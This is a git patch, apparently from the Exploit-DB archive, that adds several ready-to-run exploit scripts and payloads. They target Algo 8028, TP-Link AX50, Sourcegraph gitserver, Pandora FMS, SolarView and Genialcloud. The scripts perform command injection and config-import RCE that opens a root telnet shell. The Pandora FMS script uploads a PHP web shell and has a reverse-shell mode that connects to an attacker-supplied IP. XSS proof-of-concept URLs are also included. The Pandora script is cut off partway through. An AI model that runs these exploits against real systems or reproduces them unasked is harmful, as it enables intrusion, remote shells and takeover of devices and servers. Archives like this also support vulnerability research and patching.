From 29e275db9480cbfd66e6f69690ba893f20754749 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 15 Jun 2022 05:01:57 +0000 Subject: [PATCH] DB: 2022-06-15 16 changes to exploits/shellcodes Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE) Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE) HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated) Virtua Software Cobranca 12S - SQLi Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF) Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated) Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS) Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated) ChurchCRM 4.4.5 - SQLi Old Age Home Management System 1.0 - SQLi Authentication Bypass SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS) SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS) --- exploits/hardware/remote/50960.py | 81 ++++++++ exploits/hardware/remote/50962.py | 295 ++++++++++++++++++++++++++++ exploits/hardware/webapps/50967.txt | 13 ++ exploits/hardware/webapps/50968.txt | 12 ++ exploits/multiple/remote/50964.py | 86 ++++++++ exploits/multiple/webapps/50955.txt | 46 +++++ exploits/php/webapps/50961.py | 293 +++++++++++++++++++++++++++ exploits/php/webapps/50963.py | 88 +++++++++ exploits/php/webapps/50965.txt | 27 +++ exploits/php/webapps/50966.txt | 38 ++++ exploits/windows/local/50953.txt | 38 ++++ exploits/windows/local/50954.txt | 29 +++ exploits/windows/local/50959.txt | 29 +++ exploits/windows/remote/50956.txt | 28 +++ exploits/windows/remote/50957.txt | 18 ++ exploits/windows/remote/50958.txt | 57 ++++++ files_exploits.csv | 16 ++ 17 files changed, 1194 insertions(+) create mode 100755 exploits/hardware/remote/50960.py create mode 100755 exploits/hardware/remote/50962.py create mode 100644 exploits/hardware/webapps/50967.txt create mode 100644 exploits/hardware/webapps/50968.txt create mode 100755 exploits/multiple/remote/50964.py create mode 100644 exploits/multiple/webapps/50955.txt create mode 100755 exploits/php/webapps/50961.py create mode 100755 exploits/php/webapps/50963.py create mode 100644 exploits/php/webapps/50965.txt create mode 100644 exploits/php/webapps/50966.txt create mode 100644 exploits/windows/local/50953.txt create mode 100644 exploits/windows/local/50954.txt create mode 100644 exploits/windows/local/50959.txt create mode 100644 exploits/windows/remote/50956.txt create mode 100644 exploits/windows/remote/50957.txt create mode 100644 exploits/windows/remote/50958.txt diff --git a/exploits/hardware/remote/50960.py b/exploits/hardware/remote/50960.py new file mode 100755 index 000000000..ce5bd2469 --- /dev/null +++ b/exploits/hardware/remote/50960.py @@ -0,0 +1,81 @@ +# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) +# Google Dork: intitle:"Algo 8028 Control Panel" +# Shodan: title:"Algo 8028 Control Panel" +# Date: 2022-06-07 +# Exploit Author: Filip Carlsson +# Vendor Homepage: https://www.algosolutions.com/ +# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/ +# Version: 3.3.3 +# Tested on: Version 3.3.3 +# CVE : N/A +# Exploit: + +# Due to bad sanitation in http:///control/fm-data.lua you can do command injection as root +# Request: POST +# Formdata: +# action: rename +# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;" +# target: / + +#!/usr/bin/env python3 +import sys +import requests + +cookie=None + +def main(): + # check if provided 3 args + if len(sys.argv) != 4: + print_help() + return + else: + host = sys.argv[1] + password = sys.argv[2] + command = sys.argv[3] + + if login(host, password): + # if login was successful, send command + send_command(host, command) + +def print_help(): + print("Usage: algo.py 192.168.1.123 password command") + print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"") + +def login(host, password): + url = f"http://{host}/index.lua" + data = {"pwd": password} + res = requests.post(url, data=data) + + # check if html contains "Invalid Password" + if "Invalid Password" in res.text: + print("Invalid password") + return False + else: + # save cookie + global cookie + cookie = res.cookies + print("Successfully logged in\n") + return True + +def send_command(host, command): + url = f"http://{host}/control/fm-data.lua" + data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"} + res = requests.post(url, data=data, cookies=cookie) + + # get http://host/cmd.txt + url = f"http://{host}/a.txt" + res = requests.get(url) + + # if "404 Not Found" in text then command was not executed + if "404 Not Found" in res.text: + print("Command was not executed (404)") + else: + print(res.text) + + # delete cmd.txt + url = f"http://{host}/control/fm-data.lua" + data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"} + requests.post(url, data=data, cookies=cookie) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/remote/50962.py b/exploits/hardware/remote/50962.py new file mode 100755 index 000000000..1323d5b2b --- /dev/null +++ b/exploits/hardware/remote/50962.py @@ -0,0 +1,295 @@ +# Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Tomas Melicher +# Technical Details: https://github.com/aaronsvk/CVE-2022-30075 +# Date: 2022-06-08 +# Vendor Homepage: https://www.tp-link.com/ +# Tested On: Tp-Link Archer AX50 +# Vulnerability Description: Remote Code Execution via importing malicious config file +# CVE: CVE-2022-30075 + +#!/usr/bin/python3 + +import argparse # pip install argparse +import requests # pip install requests +import binascii, base64, os, re, json, sys, time, math, random, hashlib +import tarfile, zlib +from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome +from Crypto.PublicKey import RSA +from Crypto.Util.Padding import pad, unpad +from Crypto.Random import get_random_bytes +from urllib.parse import urlencode + +class WebClient(object): + + def __init__(self, target, password): + self.target = target + self.password = password.encode('utf-8') + self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8') + self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') + self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') + + self.stok = '' + self.session = requests.Session() + + data = self.basic_request('/login?form=auth', {'operation':'read'}) + if data['success'] != True: + print('[!] unsupported router') + return + self.sign_rsa_n = int(data['data']['key'][0], 16) + self.sign_rsa_e = int(data['data']['key'][1], 16) + self.seq = data['data']['seq'] + + data = self.basic_request('/login?form=keys', {'operation':'read'}) + self.password_rsa_n = int(data['data']['password'][0], 16) + self.password_rsa_e = int(data['data']['password'][1], 16) + + self.stok = self.login() + + + def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = pad(plaintext, aes_block_size) + return cipher.encrypt(plaintext_padded) + + + def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = cipher.decrypt(ciphertext) + plaintext = unpad(plaintext_padded, aes_block_size) + return plaintext + + + def rsa_encrypt(self, n, e, plaintext): + public_key = RSA.construct((n, e)).publickey() + encryptor = PKCS1_v1_5.new(public_key) + block_size = int(public_key.n.bit_length()/8) - 11 + encrypted_text = '' + for i in range(0, len(plaintext), block_size): + encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex() + return encrypted_text + + + def download_request(self, url, post_data): + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True) + filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0] + if os.path.exists(filepath): + print('[!] can\'t download, file "%s" already exists' % filepath) + return + with open(filepath, 'wb') as f: + for chunk in res.iter_content(chunk_size=4096): + f.write(chunk) + return filepath + + + def basic_request(self, url, post_data, files_data={}): + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data) + return json.loads(res.content) + + + def encrypted_request(self, url, post_data): + serialized_data = urlencode(post_data) + encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8')) + encrypted_data = base64.b64encode(encrypted_data) + + signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data)) + encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature) + + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important + if(res.status_code != 200): + print('[!] url "%s" returned unexpected status code'%(url)) + return + encrypted_data = json.loads(res.content) + encrypted_data = base64.b64decode(encrypted_data['data']) + data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data) + return json.loads(data) + + + def login(self): + post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)} + data = self.encrypted_request('/login?form=login', post_data) + if data['success'] != True: + print('[!] login failed') + return + print('[+] logged in, received token (stok): %s'%(data['data']['stok'])) + return data['data']['stok'] + + + +class BackupParser(object): + + def __init__(self, filepath): + self.encrypted_path = os.path.abspath(filepath) + self.decrypted_path = os.path.splitext(filepath)[0] + + self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua + self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua + + + def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = pad(plaintext, aes_block_size) + return cipher.encrypt(plaintext_padded) + + + def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = cipher.decrypt(ciphertext) + plaintext = unpad(plaintext_padded, aes_block_size) + return plaintext + + + def encrypt_config(self): + if not os.path.isdir(self.decrypted_path): + print('[!] invalid directory "%s"'%(self.decrypted_path)) + return + + # encrypt, compress each .xml using zlib and add them to tar archive + with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar: + for filename in os.listdir(self.decrypted_path): + basename,ext = os.path.splitext(filename) + if ext == '.xml': + xml_path = '%s/%s'%(self.decrypted_path,filename) + bin_path = '%s/%s.bin'%(self.decrypted_path,basename) + with open(xml_path, 'rb') as f: + plaintext = f.read() + if len(plaintext) == 0: + f = open(bin_path, 'w') + f.close() + else: + compressed = zlib.compress(plaintext) + encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) + with open(bin_path, 'wb') as f: + f.write(encrypted) + tar.add(bin_path, os.path.basename(bin_path)) + os.unlink(bin_path) + # compress tar archive using zlib and encrypt + with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2: + compressed = zlib.compress(f1.read()+f2.read()) + encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) + # write into final config file + with open('%s'%(self.encrypted_path), 'wb') as f: + f.write(encrypted) + os.unlink('%s/data.tar'%(self.decrypted_path)) + + + def decrypt_config(self): + if not os.path.isfile(self.encrypted_path): + print('[!] invalid file "%s"'%(self.encrypted_path)) + return + + # decrypt and decompress config file + with open(self.encrypted_path, 'rb') as f: + decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read()) + decompressed = zlib.decompress(decrypted) + os.mkdir(self.decrypted_path) + # store decrypted data into files + with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f: + f.write(decompressed[0:16]) + with open('%s/data.tar'%(self.decrypted_path), 'wb') as f: + f.write(decompressed[16:]) + # untar second part of decrypted data + with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar: + tar.extractall(path=self.decrypted_path) + # decrypt and decompress each .bin file from tar archive + for filename in os.listdir(self.decrypted_path): + basename,ext = os.path.splitext(filename) + if ext == '.bin': + bin_path = '%s/%s'%(self.decrypted_path,filename) + xml_path = '%s/%s.xml'%(self.decrypted_path,basename) + with open(bin_path, 'rb') as f: + ciphertext = f.read() + os.unlink(bin_path) + if len(ciphertext) == 0: + f = open(xml_path, 'w') + f.close() + continue + decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext) + decompressed = zlib.decompress(decrypted) + with open(xml_path, 'wb') as f: + f.write(decompressed) + os.unlink('%s/data.tar'%(self.decrypted_path)) + + + def modify_config(self, command): + xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path) + if not os.path.isfile(xml_path): + print('[!] invalid file "%s"'%(xml_path)) + return + + with open(xml_path, 'r') as f: + xml_content = f.read() + + # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script + payload = '\n' + payload += 'on\n' + payload += 'http://127.0.0.1/\n' + payload += 'x.example.org\n' + payload += 'X\n' + payload += 'X\n' + payload += 'script\n' + payload += '%s\n' % (command.replace('<','<').replace('&','&')) + payload += 'internet\n' # not worked for other interfaces + payload += '5\n' + payload += 'seconds\n' + payload += '3\n' + payload += '12\n' + payload += 'hours\n' + payload += '30\n' + payload += 'days\n' + payload += '\n' + + if '' in xml_content: + xml_content = re.sub(r'[\s\S]+?\n', '%s'%(payload), xml_content, 1) + else: + xml_content = xml_content.replace('\n', '\n%s'%(payload), 1) + with open(xml_path, 'w') as f: + f.write(xml_content) + + + +arg_parser = argparse.ArgumentParser() +arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True) +arg_parser.add_argument('-p', metavar='password', required=True) +arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config') +arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config') +arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute') +args = arg_parser.parse_args() + +client = WebClient(args.t, args.p) +parser = None + +if not args.r: + print('[*] downloading config file ...') + filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'}) + if not filepath: + sys.exit(-1) + + print('[*] decrypting config file "%s" ...'%(filepath)) + parser = BackupParser(filepath) + parser.decrypt_config() + print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path)) + +if not args.b and not args.r: + filepath = '%s_modified'%(parser.decrypted_path) + os.rename(parser.decrypted_path, filepath) + parser.decrypted_path = os.path.abspath(filepath) + parser.encrypted_path = '%s.bin'%(filepath) + parser.modify_config(args.c) + print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path)) + +if not args.b: + if parser is None: + parser = BackupParser('%s.bin'%(args.r.rstrip('/'))) + print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path)) + parser.encrypt_config() + data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'}) + timeout = data['data']['totaltime'] if data['success'] else 180 + print('[*] uploading modified config file "%s"'%(parser.encrypted_path)) + data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')}) + if not data['success']: + print('[!] unexpected response') + print(data) + sys.exit(-1) + + print('[+] config file successfully uploaded') + print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t)) \ No newline at end of file diff --git a/exploits/hardware/webapps/50967.txt b/exploits/hardware/webapps/50967.txt new file mode 100644 index 000000000..6c00bf960 --- /dev/null +++ b/exploits/hardware/webapps/50967.txt @@ -0,0 +1,13 @@ +# Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS) +# Date: 2022-05-15 +# Exploit Author: Ahmed Alroky +# Author Company : AIactive +# Version: ver.6.00 +# Vendor home page : https://www.contec.com/ +# Authentication Required: No +# CVE : CVE-2022-29299 +# Tested on: Windows + +# Proof Of Concept: + +http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6 \ No newline at end of file diff --git a/exploits/hardware/webapps/50968.txt b/exploits/hardware/webapps/50968.txt new file mode 100644 index 000000000..96f91718e --- /dev/null +++ b/exploits/hardware/webapps/50968.txt @@ -0,0 +1,12 @@ +# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS) +# Date: 2022-05-15 +# Exploit Author: Ahmed Alroky +# Author Company : AIactive +# Version: ver.6.00 +# Vendor home page : https://www.contec.com/ +# Authentication Required: No +# CVE : CVE-2022-29301 +# Tested on: Windows + +# Proof Of Concept: +http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green \ No newline at end of file diff --git a/exploits/multiple/remote/50964.py b/exploits/multiple/remote/50964.py new file mode 100755 index 000000000..910a11ef2 --- /dev/null +++ b/exploits/multiple/remote/50964.py @@ -0,0 +1,86 @@ +# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) +# Date: 2022-06-10 +# Exploit Author: Altelus +# Vendor Homepage: https://about.sourcegraph.com/ +# Version: 3.63.3 +# Tested on: Linux +# CVE : CVE-2022-23642 +# Docker Container: sourcegraph/server:3.36.3 + +# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. +# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed +# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible +# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3 +# +# Exploitation parameters: +# - Exposed Sourcegraph gitserver +# - Existing repo on sourcegraph + + + +import json +import argparse +import requests + +def exploit(host, existing_git, cmd): + + # setting sshCommand + data = { + "Repo" : existing_git, + "Args" : [ + "config", + "core.sshCommand", + cmd + ] + } + + res = requests.get(host+"/exec", json=data).text + + if len(res) > 0: + print("[-] Didn't work: {}".format(res)) + exit(0) + + # setting fake origin + data = { + "Repo" : existing_git, + "Args" : [ + "remote", + "add", + "origin", + "git@lolololz:foo/bar.git" + ] + } + + res = requests.get(host+"/exec", json=data).text + + if len(res) > 0: + print("[-] Didn't work: {}".format(res)) + exit(0) + + # triggering command using push + data = { + "Repo" : existing_git, + "Args" : [ + "push", + "origin", + "master" + ] + } + + res = requests.get(host+"/exec", json=data).text + + print("[*] Finished executing exploit") + +parser = argparse.ArgumentParser() + +parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host") +parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph") +parser.add_argument('--cmd', required=True, help="Command to run") +args = parser.parse_args() + +host = args.gitserver_host +existing_git = args.existing_git +cmd = args.cmd + + +exploit(host, existing_git, cmd) \ No newline at end of file diff --git a/exploits/multiple/webapps/50955.txt b/exploits/multiple/webapps/50955.txt new file mode 100644 index 000000000..6b67985f0 --- /dev/null +++ b/exploits/multiple/webapps/50955.txt @@ -0,0 +1,46 @@ +# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS) +# Date: 2022-06-01 +# Exploit Author: Andrea Intilangelo +# Vendor Homepage: https://www.avantune.com +# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com +# Version: 10 +# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) +# CVE: CVE-2022-29296 + + +Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the +same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject +and execute arbitrary web scripts or HTML via a crafted payload. + +Request parameters affected is "msg". + +PoC Request: +GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 +Host: [REDACTED] +Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +PoC Response: +HTTP/1.1 200 OK +Cache-Control: private +Content-Type: text/html; charset=utf-8 +Server: Microsoft-IIS/10.0 +X-AspNet-Version: 4.0.30319 +X-Powered-By: ASP.NET +Date: Wed, 11 May 2022 10:51:10 GMT +Connection: close +Content-Length: 8162 + + + + + var Msg = 'Invalid username or password';alert("y0! XSS here :)")//'; +...[SNIP]... \ No newline at end of file diff --git a/exploits/php/webapps/50961.py b/exploits/php/webapps/50961.py new file mode 100755 index 000000000..5783a504e --- /dev/null +++ b/exploits/php/webapps/50961.py @@ -0,0 +1,293 @@ +# Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) +# Date: 05/20/2022 +# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) +# Vendor Homepage: https://pandorafms.com/ +# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz +# Version: v7.0NG.742 +# Tested on: Pandora FMS v7.0NG.742 (Ubuntu) +# CVE: CVE-2020-5844 +# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844 +# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020. + +#!/usr/bin/env python3 + +# Imports +try: + import requests +except: + print(f"ERRORED: RUN: pip install requests") + exit() +import sys +import time +import urllib.parse + +# Class for colors +class color: + red = '\033[91m' + gold = '\033[93m' + blue = '\033[36m' + green = '\033[92m' + no = '\033[0m' + +# Print UNICORD ASCII Art +def UNICORD_ASCII(): + print(rf""" +{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} +{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} +{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} +{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} + """) + +# Print exploit help menu +def help(): + print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution + +Usage: + python3 exploit-CVE-2020-5844.py -t -u + python3 exploit-CVE-2020-5844.py -t -p + python3 exploit-CVE-2020-5844.py -t -p [-c ] + python3 exploit-CVE-2020-5844.py -t -p [-s ] + python3 exploit-CVE-2020-5844.py -t -p [-w ] + python3 exploit-CVE-2020-5844.py -h + +Options: + -t Target host and port. Provide target IP address and port. + -u Target username and password. Provide username and password to log in to Pandora FMS. + -p Target valid PHP session ID. No username or password needed. (Optional) + -s Reverse shell mode. Provide local IP address and port. (Optional) + -c Custom command mode. Provide command to execute. (Optional) + -w Web shell custom mode. Provide custom PHP file name. (Optional) + -h Show this help menu. +""") + exit() + +# Pretty loading wheel +def loading(spins): + + def spinning_cursor(): + while True: + for cursor in '|/-\\': + yield cursor + + spinner = spinning_cursor() + for _ in range(spins): + sys.stdout.write(next(spinner)) + sys.stdout.flush() + time.sleep(0.1) + sys.stdout.write('\b') + +# Run the exploit +def exploit(exploitMode, targetSess): + + UNICORD_ASCII() + + # Print initial variables + print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}") + print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}") + if targetSess is not None: + print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") + elif targetUser is not None: + print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}") + print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}") + + if exploitMode == "command": + print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}") + if exploitMode == "web": + print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}") + if exploitMode == "shell": + print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}") + print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}") + print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}") + + loading(15) + + # If a PHPSESSID is not provided, grab one with valid username and password + if targetSess is None: + try: + getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"}) + targetSess = getSession.cookies.get('PHPSESSID') + print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") + if "login_move" in getSession.text: + print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}") + except: + print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}") + exit() + + # Set headers, parameters, and cookies for post request + headers = { + 'Host': f'{targetIP}', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874', + 'Content-Length': '1289', + 'Connection': 'close', + 'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager', + 'Upgrade-Insecure-Requests': '1', + 'Sec-Fetch-Dest': 'document', + 'Sec-Fetch-Mode': 'navigate', + 'Sec-Fetch-Site': 'same-origin', + 'Sec-Fetch-User': '?1' + } + params = ( + ('sec', 'gsetup'), + ('sec2', 'godmode/setup/file_manager') + ) + cookies = {'PHPSESSID': targetSess} + # Basic PHP web shell with 'cmd' parameter + data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n' + + # Try to upload the PHP web shell to the server + try: + response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False) + except: + print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}") + exit() + statusCode=response.status_code + if statusCode == 200: + print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}") + else: + print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}") + exit() + loading(15) + + print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}") + loading(15) + + # Print web shell location if in web shell mode + if exploitMode == "web": + print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}") + print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n") + + # Run custom command on web shell if in command mode + if exploitMode == "command": + response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}') + print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n") + print(response.text) + + # Run reverse shell command if in reverse shell mode + if exploitMode == "shell": + shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'" + try: + requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1) + print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n") + except: + print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n") + + exit() + +if __name__ == "__main__": + + args = ['-h','-t','-u','-p','-s','-c','-w'] + modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'} + + # Initialize starting variables + targetIP = None + targetPort = None + targetUser = None + 